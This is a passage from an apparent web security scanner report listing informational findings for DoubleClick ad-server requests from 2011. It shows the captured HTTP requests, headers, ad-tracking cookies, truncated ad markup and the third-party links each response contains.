http://ad.doubleclick.net/adi/N5823.Discovery/B5629823.10;sz=728x90;click0=http://oascentral.discovery.com/RealMedia/ads/click_lx.ads/www.treehugger.com/files/2011/07/sea-shepherd-ship-detained-shetland-islands-million-dollar-bond-needed.php/L18/95226291/TopLeft/DCI/6748_HewlettPackard_D_819486335/07212011_HP_6748_DCI_1stImpRdBlk_728x90_10_17205259.html/7263485738303471796b67414345734b?;ord=95226291?

The response contains the following links to other domains:

http://amch.questionmarket.com/adscgen/st.php?survey_num=922005&site=67575094&code=42823586&randnum=1100758
http://s0.2mdn.net/2309965/_Touchpad_WLNE_0_728x90_Jpeg.jpg
http://s0.2mdn.net/879366/flashwrite_1_2.js

Request

GET /adi/N5823.Discovery/B5629823.10;sz=728x90;click0=http://oascentral.discovery.com/RealMedia/ads/click_lx.ads/www.treehugger.com/files/2011/07/sea-shepherd-ship-detained-shetland-islands-million-dollar-bond-needed.php/L18/95226291/TopLeft/DCI/6748_HewlettPackard_D_819486335/07212011_HP_6748_DCI_1stImpRdBlk_728x90_10_17205259.html/7263485738303471796b67414345734b?;ord=95226291? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.treehugger.com/files/2011/07/sea-shepherd-ship-detained-shetland-islands-million-dollar-bond-needed.php
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=ca42d81370000b3|2010860/738146/15149,2588783/933076/15138,690333/262595/15114|t=1305367759|et=730|cs=002213fd482cdcbface2418698

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Content-Length: 7030
Cache-Control: no-cache
Pragma: no-cache
Date: Sat, 23 Jul 2011 13:19:06 GMT
Expires: Sat, 23 Jul 2011 13:19:06 GMT
Discarded: true

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0>
<script src="http://s0.2mdn.net/879366/flashwrite_1_2.js"></script>
...[SNIP]...
3485738303471796b67414345734b?http://h41112.www4.hp.com/promo/webos/us/en/tablet/touchpad.html?jumpid=ex_r11615_us/en/HHO/psg/FY11/TouchPad&AOID=102890/dm:_N5823.Discovery_67575094_243915216_42823586"><img src="http://s0.2mdn.net/2309965/_Touchpad_WLNE_0_728x90_Jpeg.jpg" width="728" height="90" border="0" alt="Advertisement" galleryimg="no"></a></noscript>
<script SRC="http://amch.questionmarket.com/adscgen/st.php?survey_num=922005&site=67575094&code=42823586&randnum=1100758" type="text/javascript"></script>
...[SNIP]...

18.17. http://ad.doubleclick.net/adi/N5823.Discovery/B5629823.11 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adi/N5823.Discovery/B5629823.11

Issue detail

The page was loaded from a URL containing a query string:

http://ad.doubleclick.net/adi/N5823.Discovery/B5629823.11;sz=160x600;click0=http://oascentral.discovery.com/RealMedia/ads/click_lx.ads/www.treehugger.com/files/2011/07/sea-shepherd-ship-detained-shetland-islands-million-dollar-bond-needed.php/L18/182607716/x29/DCI/6748_HewlettPackard_D_819486337/07212011_1stImpRdBlk_160x600_11_17205264.html/7263485738303471796b67414345734b?;ord=182607716?

The response contains the following links to other domains:

http://amch.questionmarket.com/adscgen/st.php?survey_num=922005&site=67575096&code=42825637&randnum=1107821
http://s0.2mdn.net/2309965/5-_Touchpad_WLNE_0_160x600_Jpeg.jpg
http://s0.2mdn.net/879366/flashwrite_1_2.js

Request

GET /adi/N5823.Discovery/B5629823.11;sz=160x600;click0=http://oascentral.discovery.com/RealMedia/ads/click_lx.ads/www.treehugger.com/files/2011/07/sea-shepherd-ship-detained-shetland-islands-million-dollar-bond-needed.php/L18/182607716/x29/DCI/6748_HewlettPackard_D_819486337/07212011_1stImpRdBlk_160x600_11_17205264.html/7263485738303471796b67414345734b?;ord=182607716? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.treehugger.com/files/2011/07/sea-shepherd-ship-detained-shetland-islands-million-dollar-bond-needed.php
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=ca42d81370000b3|2010860/738146/15149,2588783/933076/15138,690333/262595/15114|t=1305367759|et=730|cs=002213fd482cdcbface2418698

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Content-Length: 6989
Cache-Control: no-cache
Pragma: no-cache
Date: Sat, 23 Jul 2011 13:19:13 GMT
Expires: Sat, 23 Jul 2011 13:19:13 GMT
Discarded: true

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0>
<script src="http://s0.2mdn.net/879366/flashwrite_1_2.js"></script>
...[SNIP]...
3485738303471796b67414345734b?http://h41112.www4.hp.com/promo/webos/us/en/tablet/touchpad.html?jumpid=ex_r11615_us/en/HHO/psg/FY11/TouchPad&AOID=102890/dm:_N5823.Discovery_67575096_243894858_42825637"><img src="http://s0.2mdn.net/2309965/5-_Touchpad_WLNE_0_160x600_Jpeg.jpg" width="160" height="600" border="0" alt="Advertisement" galleryimg="no"></a></noscript>

<script SRC="http://amch.questionmarket.com/adscgen/st.php?survey_num=922005&site=67575096&code=42825637&randnum=1107821" type="text/javascript"></script>
...[SNIP]...

18.18. http://ad.doubleclick.net/adi/N5823.Discovery/B5629823.12 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adi/N5823.Discovery/B5629823.12

Issue detail

The page was loaded from a URL containing a query string:

http://ad.doubleclick.net/adi/N5823.Discovery/B5629823.12;sz=300x250;click0=http://oascentral.discovery.com/RealMedia/ads/click_lx.ads/www.treehugger.com/files/2011/07/sea-shepherd-ship-detained-shetland-islands-million-dollar-bond-needed.php/L18/2080163699/x25/DCI/6748_HewlettPackard_D_819486339/07212011_HP_6748_DCI_1stImpRdBlk_300x250_12_17205266.html/7263485738303471796b67414345734b?;ord=2080163699?

The response contains the following links to other domains:

http://amch.questionmarket.com/adscgen/st.php?survey_num=922005&site=67575097&code=42823090&randnum=1100774
http://s0.2mdn.net/2309965/_Touchpad_WLNE_0_300x250_Jpeg.jpg
http://s0.2mdn.net/879366/flashwrite_1_2.js

Request

GET /adi/N5823.Discovery/B5629823.12;sz=300x250;click0=http://oascentral.discovery.com/RealMedia/ads/click_lx.ads/www.treehugger.com/files/2011/07/sea-shepherd-ship-detained-shetland-islands-million-dollar-bond-needed.php/L18/2080163699/x25/DCI/6748_HewlettPackard_D_819486339/07212011_HP_6748_DCI_1stImpRdBlk_300x250_12_17205266.html/7263485738303471796b67414345734b?;ord=2080163699? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.treehugger.com/files/2011/07/sea-shepherd-ship-detained-shetland-islands-million-dollar-bond-needed.php
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=ca42d81370000b3|2010860/738146/15149,2588783/933076/15138,690333/262595/15114|t=1305367759|et=730|cs=002213fd482cdcbface2418698

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Content-Length: 7036
Cache-Control: no-cache
Pragma: no-cache
Date: Sat, 23 Jul 2011 13:19:06 GMT
Expires: Sat, 23 Jul 2011 13:19:06 GMT
Discarded: true

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0>
<script src="http://s0.2mdn.net/879366/flashwrite_1_2.js"></script>
...[SNIP]...
3485738303471796b67414345734b?http://h41112.www4.hp.com/promo/webos/us/en/tablet/touchpad.html?jumpid=ex_r11615_us/en/HHO/psg/FY11/TouchPad&AOID=102890/dm:_N5823.Discovery_67575097_243893888_42823090"><img src="http://s0.2mdn.net/2309965/_Touchpad_WLNE_0_300x250_Jpeg.jpg" width="300" height="250" border="0" alt="Advertisement" galleryimg="no"></a></noscript>
<script SRC="http://amch.questionmarket.com/adscgen/st.php?survey_num=922005&site=67575097&code=42823090&randnum=1100774" type="text/javascript"></script>
...[SNIP]...

18.19. http://ad.doubleclick.net/adi/N5823.Discovery/B5629823.16 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adi/N5823.Discovery/B5629823.16

Issue detail

The page was loaded from a URL containing a query string:

http://ad.doubleclick.net/adi/N5823.Discovery/B5629823.16;sz=728x90;click0=http://oascentral.discovery.com/RealMedia/ads/click_lx.ads/www.treehugger.com/science_technology/L37/1987870436/TopLeft/DCI/6748_HewlettPackard_D_819486366/07212011_HP_6748_CT_Tech_728x90_16_17205320.html/7263485738303471796b67414345734b?;ord=1987870436?

The response contains the following links to other domains:

http://amch.questionmarket.com/adscgen/st.php?survey_num=922005&site=67575105&code=42823584&randnum=2561368
http://s0.2mdn.net/2309965/_Touchpad_WLNE_0_728x90_Jpeg.jpg
http://s0.2mdn.net/879366/flashwrite_1_2.js

Request

GET /adi/N5823.Discovery/B5629823.16;sz=728x90;click0=http://oascentral.discovery.com/RealMedia/ads/click_lx.ads/www.treehugger.com/science_technology/L37/1987870436/TopLeft/DCI/6748_HewlettPackard_D_819486366/07212011_HP_6748_CT_Tech_728x90_16_17205320.html/7263485738303471796b67414345734b?;ord=1987870436? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.treehugger.com/science_technology/?campaign=th_nav_scitech
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=ca42d81370000b3|2010860/738146/15149,2588783/933076/15138,690333/262595/15114|t=1305367759|et=730|cs=002213fd482cdcbface2418698

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Content-Length: 6715
Cache-Control: no-cache
Pragma: no-cache
Date: Sat, 23 Jul 2011 13:43:26 GMT
Expires: Sat, 23 Jul 2011 13:43:26 GMT
Discarded: true

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0>
<script src="http://s0.2mdn.net/879366/flashwrite_1_2.js"></script>
...[SNIP]...
3485738303471796b67414345734b?http://h41112.www4.hp.com/promo/webos/us/en/tablet/touchpad.html?jumpid=ex_r11615_us/en/HHO/psg/FY11/TouchPad&AOID=102890/dm:_N5823.Discovery_67575105_243916031_42823584"><img src="http://s0.2mdn.net/2309965/_Touchpad_WLNE_0_728x90_Jpeg.jpg" width="728" height="90" border="0" alt="Advertisement" galleryimg="no"></a></noscript>
<script SRC="http://amch.questionmarket.com/adscgen/st.php?survey_num=922005&site=67575105&code=42823584&randnum=2561368" type="text/javascript"></script>
...[SNIP]...

18.20. http://ad.doubleclick.net/adi/N5823.Discovery/B5629823.17 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adi/N5823.Discovery/B5629823.17

Issue detail

The page was loaded from a URL containing a query string:

http://ad.doubleclick.net/adi/N5823.Discovery/B5629823.17;sz=160x600;click0=http://oascentral.discovery.com/RealMedia/ads/click_lx.ads/www.treehugger.com/science_technology/L37/5623109/x29/DCI/6748_HewlettPackard_D_819486368/07212011_HP_6748_DCI_CT_Tech_160x600_17_17205321.html/7263485738303471796b67414345734b?;ord=5623109?

The response contains the following links to other domains:

http://amch.questionmarket.com/adscgen/st.php?survey_num=922005&site=67575107&code=42825515&randnum=2561399
http://s0.2mdn.net/2309965/_Touchpad_WLNE_0_160x600_Jpeg.jpg
http://s0.2mdn.net/879366/flashwrite_1_2.js

Request

GET /adi/N5823.Discovery/B5629823.17;sz=160x600;click0=http://oascentral.discovery.com/RealMedia/ads/click_lx.ads/www.treehugger.com/science_technology/L37/5623109/x29/DCI/6748_HewlettPackard_D_819486368/07212011_HP_6748_DCI_CT_Tech_160x600_17_17205321.html/7263485738303471796b67414345734b?;ord=5623109? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.treehugger.com/science_technology/?campaign=th_nav_scitech
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=ca42d81370000b3|2010860/738146/15149,2588783/933076/15138,690333/262595/15114|t=1305367759|et=730|cs=002213fd482cdcbface2418698

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Content-Length: 6728
Cache-Control: no-cache
Pragma: no-cache
Date: Sat, 23 Jul 2011 13:43:26 GMT
Expires: Sat, 23 Jul 2011 13:43:26 GMT
Discarded: true

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0>
<script src="http://s0.2mdn.net/879366/flashwrite_1_2.js"></script>
...[SNIP]...
3485738303471796b67414345734b?http://h41112.www4.hp.com/promo/webos/us/en/tablet/touchpad.html?jumpid=ex_r11615_us/en/HHO/psg/FY11/TouchPad&AOID=102890/dm:_N5823.Discovery_67575107_243893475_42825515"><img src="http://s0.2mdn.net/2309965/_Touchpad_WLNE_0_160x600_Jpeg.jpg" width="160" height="600" border="0" alt="Advertisement" galleryimg="no"></a></noscript>

<script SRC="http://amch.questionmarket.com/adscgen/st.php?survey_num=922005&site=67575107&code=42825515&randnum=2561399" type="text/javascript"></script>
...[SNIP]...

18.21. http://ad.doubleclick.net/adi/interactive.wsj.com/markets_newsreel previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adi/interactive.wsj.com/markets_newsreel

Issue detail

The page was loaded from a URL containing a query string:

http://ad.doubleclick.net/adi/interactive.wsj.com/markets_newsreel;u=;;;mc=b2pfreezone;tile=1;sz=2x94;ord=4782478247824782;

The response contains the following link to another domain:

http://s0.2mdn.net/viewad/817-grey.gif

Request

GET /adi/interactive.wsj.com/markets_newsreel;u=;;;mc=b2pfreezone;tile=1;sz=2x94;ord=4782478247824782; HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://online.wsj.com/public/page/0_0_WP_2300_NewsReel.html?baseDocId=SB10001424053111904233404576462461660747244
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=ca42d81370000b3|2010860/738146/15149,2588783/933076/15138,690333/262595/15114|t=1305367759|et=730|cs=002213fd482cdcbface2418698

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Content-Length: 372
Date: Sat, 23 Jul 2011 04:31:02 GMT

<head><title>Click Here</title><base href="http://ad.doubleclick.net"></head><body bgcolor="white"><a target="_blank" href="http://ad.doubleclick.net/click;h=v8/3b4d/0/0/%2a/h;44306;0-0;0;31680216;31596-2/94;0/0/0;u=;~okv=;u=;;;mc=b2pfreezone;tile=1;sz=2x94;;~aopt=2/1/ff/1;~sscs=%3f"><img src="http://s0.2mdn.net/viewad/817-grey.gif" border=0 alt="Click Here"></a>
...[SNIP]...

18.22. http://ad.doubleclick.net/adi/interactive.wsj.com/markets_story previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adi/interactive.wsj.com/markets_story

Issue detail

The page was loaded from a URL containing a query string:

http://ad.doubleclick.net/adi/interactive.wsj.com/markets_story;u=;;msrc=WSJ_hp_LEFTWhatsNewsCollection;;mc=b2pfreezone;tile=1;sz=377x50;ord=7225722572257225;

The response contains the following link to another domain:

http://s0.2mdn.net/1952284/Test_3_stacked_buttons_0212.jpg

Request

GET /adi/interactive.wsj.com/markets_story;u=;;msrc=WSJ_hp_LEFTWhatsNewsCollection;;mc=b2pfreezone;tile=1;sz=377x50;ord=7225722572257225; HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://online.wsj.com/article/SB10001424053111904233404576462461660747244.html?mod=WSJ_hp_LEFTWhatsNewsCollection
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=ca42d81370000b3|2010860/738146/15149,2588783/933076/15138,690333/262595/15114|t=1305367759|et=730|cs=002213fd482cdcbface2418698

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Content-Length: 1240
Date: Sat, 23 Jul 2011 04:30:59 GMT

<head><title>Click Here</title><base href="http://ad.doubleclick.net"></head><body bgcolor="white"><img src="http://s0.2mdn.net/1952284/Test_3_stacked_buttons_0212.jpg" width="377" height="50" border="0" usemap="#Mapfeb09_stackedheader" />
<map name="Mapfeb09_stackedheader" id="Map">
...[SNIP]...

18.23. http://ad.doubleclick.net/adi/interactive.wsj.com/markets_story previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adi/interactive.wsj.com/markets_story

Issue detail

The page was loaded from a URL containing a query string:

http://ad.doubleclick.net/adi/interactive.wsj.com/markets_story;;page=article;msrc=WSJ_hp_LEFTWhatsNewsCollection;;mc=b2pfreezone;tile=2;sz=571x47;ord=8194819481948194;

The response contains the following link to another domain:

http://s0.2mdn.net/3198123/control_snippet_541x47.gif

Request

GET /adi/interactive.wsj.com/markets_story;;page=article;msrc=WSJ_hp_LEFTWhatsNewsCollection;;mc=b2pfreezone;tile=2;sz=571x47;ord=8194819481948194; HTTP/1.1
Host: ad.doubleclick.net
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://online.wsj.com/article/SB10001424053111904233404576462461660747244.html?mod=WSJ_hp_LEFTWhatsNewsCollection
Cookie: id=2230b5db2501004b||t=1311254584|et=730|cs=002213fd48635305ba9b0e4419

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Content-Length: 1357
Date: Sat, 23 Jul 2011 04:31:57 GMT

<head><title>Click Here</title><base href="http://ad.doubleclick.net"></head><body bgcolor="white"><img name="imagemap110719" src="http://s0.2mdn.net/3198123/control_snippet_541x47.gif" width="571" height="47" border="0" id="imagemap110719" usemap="#m_imagemap110719" alt="" /> <map name="m_imagemap110719" id="m_imagemap110719">
...[SNIP]...

18.24. http://ad.doubleclick.net/adi/interactive.wsj.com/markets_story previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adi/interactive.wsj.com/markets_story

Issue detail

The page was loaded from a URL containing a query string:

http://ad.doubleclick.net/adi/interactive.wsj.com/markets_story;;page=article;msrc=WSJ_hp_LEFTWhatsNewsCollection;;mc=b2pfreezone;tile=4;sz=571x208;ord=8194819481948194;

The response contains the following link to another domain:

http://s0.2mdn.net/viewad/3198123/Control_Snippet_creative_571x208.gif

Request

GET /adi/interactive.wsj.com/markets_story;;page=article;msrc=WSJ_hp_LEFTWhatsNewsCollection;;mc=b2pfreezone;tile=4;sz=571x208;ord=8194819481948194; HTTP/1.1
Host: ad.doubleclick.net
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://online.wsj.com/article/SB10001424053111904233404576462461660747244.html?mod=WSJ_hp_LEFTWhatsNewsCollection
Cookie: id=2230b5db2501004b||t=1311254584|et=730|cs=002213fd48635305ba9b0e4419

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Content-Length: 542
Date: Sat, 23 Jul 2011 04:31:57 GMT

<head><title>Click Here</title><base href="http://ad.doubleclick.net"></head><body bgcolor="white"><a target="_blank" href="http://ad.doubleclick.net/click;h=v8/3b4d/0/0/%2a/b;241502695;0-0;34;1506691
...[SNIP]...
59/42179446/1;;~okv=;;page=article;msrc=WSJ_hp_LEFTWhatsNewsCollection;;mc=b2pfreezone;tile=4;sz=571x208;;~aopt=2/1/e9/1;~sscs=%3fhttps://buy.wsj.com/shopandbuy/order/subscribe.jsp?trackCode=aaagprm2"><img src="http://s0.2mdn.net/viewad/3198123/Control_Snippet_creative_571x208.gif" border=0 alt="Click Here"></a>
...[SNIP]...

18.25. http://ad.doubleclick.net/adi/interactive.wsj.com/markets_story previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adi/interactive.wsj.com/markets_story

Issue detail

The page was loaded from a URL containing a query string:

http://ad.doubleclick.net/adi/interactive.wsj.com/markets_story;;page=article;msrc=WSJ_hp_LEFTWhatsNewsCollection;;mc=b2pfreezone;tile=3;sz=571x18;ord=8194819481948194;

The response contains the following link to another domain:

http://s0.2mdn.net/3198123/control_snippet_V1.gif

Request

GET /adi/interactive.wsj.com/markets_story;;page=article;msrc=WSJ_hp_LEFTWhatsNewsCollection;;mc=b2pfreezone;tile=3;sz=571x18;ord=8194819481948194; HTTP/1.1
Host: ad.doubleclick.net
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://online.wsj.com/article/SB10001424053111904233404576462461660747244.html?mod=WSJ_hp_LEFTWhatsNewsCollection
Cookie: id=2230b5db2501004b||t=1311254584|et=730|cs=002213fd48635305ba9b0e4419

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Content-Length: 1367
Date: Sat, 23 Jul 2011 04:31:56 GMT

<head><title>Click Here</title><base href="http://ad.doubleclick.net"></head><body bgcolor="white"><img name="control_snippet_V1" src="http://s0.2mdn.net/3198123/control_snippet_V1.gif" width="571" height="18" border="0" id="control_snippet_V1" usemap="#m_control_snippet_V1" alt=""> <map name="m_control_snippet_V1" id="m_control_snippet_V1">
...[SNIP]...

18.26. http://ad.doubleclick.net/adj/N2883.132636.QUADRANTONE.COM/B5629721.18 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adj/N2883.132636.QUADRANTONE.COM/B5629721.18

Issue detail

The page was loaded from a URL containing a query string:

http://ad.doubleclick.net/adj/N2883.132636.QUADRANTONE.COM/B5629721.18;sz=728x90;;click0=http://ad.doubleclick.net/click%3Bh%3Dv8/3b4d/3/0/%2a/q%3B243590664%3B0-0%3B0%3B33019313%3B3454-728/90%3B43065677/43083464/1%3Bu%3D%2Cq1-10109137099_1311428778%2C120221f8320d7dc%2Cjobs%2Can.115-ex.29-ex.58-ex.40-dx.13-dx.1-dx.10-dx.12-dx.22-dx.31-dx.34-dx.36-dx.40-dx.bh-dx.bj-bk.na-bk.it-mm.aa1-mm.ab5-mm.ac5-mm.ad5-mm.aj1-mm.al1-mm.am5-mm.ao5-mm.ar5-mm.as5-mm.at5-mm.au1-cm.polit_l%3B~aopt%3D3/1/20/0%3B~sscs%3D%3f;pc=[TPAS_ID];ord=2732602?

The response contains the following link to another domain:

http://s0.2mdn.net/3149779/PID_1651471_CIT_FG11_24-Charities_728x90.jpg

Request

GET /adj/N2883.132636.QUADRANTONE.COM/B5629721.18;sz=728x90;;click0=http://ad.doubleclick.net/click%3Bh%3Dv8/3b4d/3/0/%2a/q%3B243590664%3B0-0%3B0%3B33019313%3B3454-728/90%3B43065677/43083464/1%3Bu%3D%2Cq1-10109137099_1311428778%2C120221f8320d7dc%2Cjobs%2Can.115-ex.29-ex.58-ex.40-dx.13-dx.1-dx.10-dx.12-dx.22-dx.31-dx.34-dx.36-dx.40-dx.bh-dx.bj-bk.na-bk.it-mm.aa1-mm.ab5-mm.ac5-mm.ad5-mm.aj1-mm.al1-mm.am5-mm.ao5-mm.ar5-mm.as5-mm.at5-mm.au1-cm.polit_l%3B~aopt%3D3/1/20/0%3B~sscs%3D%3f;pc=[TPAS_ID];ord=2732602? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.boston.com/lifestyle/articles/2011/07/23/facebook_twitter_obligations_persist_during_vacations/?p1=Upbox_links
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=ca42d81370000b3|2010860/738146/15149,2588783/933076/15138,690333/262595/15114|t=1305367759|et=730|cs=002213fd482cdcbface2418698

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Content-Length: 38740
Date: Sat, 23 Jul 2011 13:48:16 GMT

document.write('');

if(typeof(dartCallbackObjects) == "undefined")
var dartCallbackObjects = new Array();
if(typeof(dartCreativeDisplayManagers) == "undefined")
var dartCreativeDisplayManagers =
...[SNIP]...
bk.it-mm.aa1-mm.ab5-mm.ac5-mm.ad5-mm.aj1-mm.al1-mm.am5-mm.ao5-mm.ar5-mm.as5-mm.at5-mm.au1-cm.polit_l%3B~aopt%3D3/1/20/0%3B~sscs%3D%3fhttp://www.fuelinggood.com?cmpid=5629721|1115312|65553367|42426450"><IMG SRC="http://s0.2mdn.net/3149779/PID_1651471_CIT_FG11_24-Charities_728x90.jpg" width="728" height="90" BORDER=0 alt=""></A>
...[SNIP]...

18.27. http://ad.doubleclick.net/adj/cm.yearbook/ford_ron_071911 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adj/cm.yearbook/ford_ron_071911

Issue detail

The page was loaded from a URL containing a query string:

http://ad.doubleclick.net/adj/cm.yearbook/ford_ron_071911;net=cm;u=,cm-10101735942_1311273740,11fda490648f83c,noc,ax.60-cm.games_h-bz.25;;cmw=nowl;sz=728x90;net=cm;env=ifr;ord1=504647;contx=noc;an=60;dc=w;btg=cm.games_h;btg=bz.25;ord=800189183?

The response contains the following link to another domain:

http://s0.2mdn.net/viewad/2523939/207384/adc_predlend_fear_728x90.jpg

Request

GET /adj/cm.yearbook/ford_ron_071911;net=cm;u=,cm-10101735942_1311273740,11fda490648f83c,noc,ax.60-cm.games_h-bz.25;;cmw=nowl;sz=728x90;net=cm;env=ifr;ord1=504647;contx=noc;an=60;dc=w;btg=cm.games_h;btg=bz.25;ord=800189183? HTTP/1.1
Host: ad.doubleclick.net
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.myyearbook.com/advertising/default.php?n=TribalFusion&section=None&size=728x90&site=MYB&sub=Network
Cookie: id=2230b5db2501004b||t=1311254584|et=730|cs=002213fd48635305ba9b0e4419

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Content-Length: 590
Date: Thu, 21 Jul 2011 18:42:24 GMT

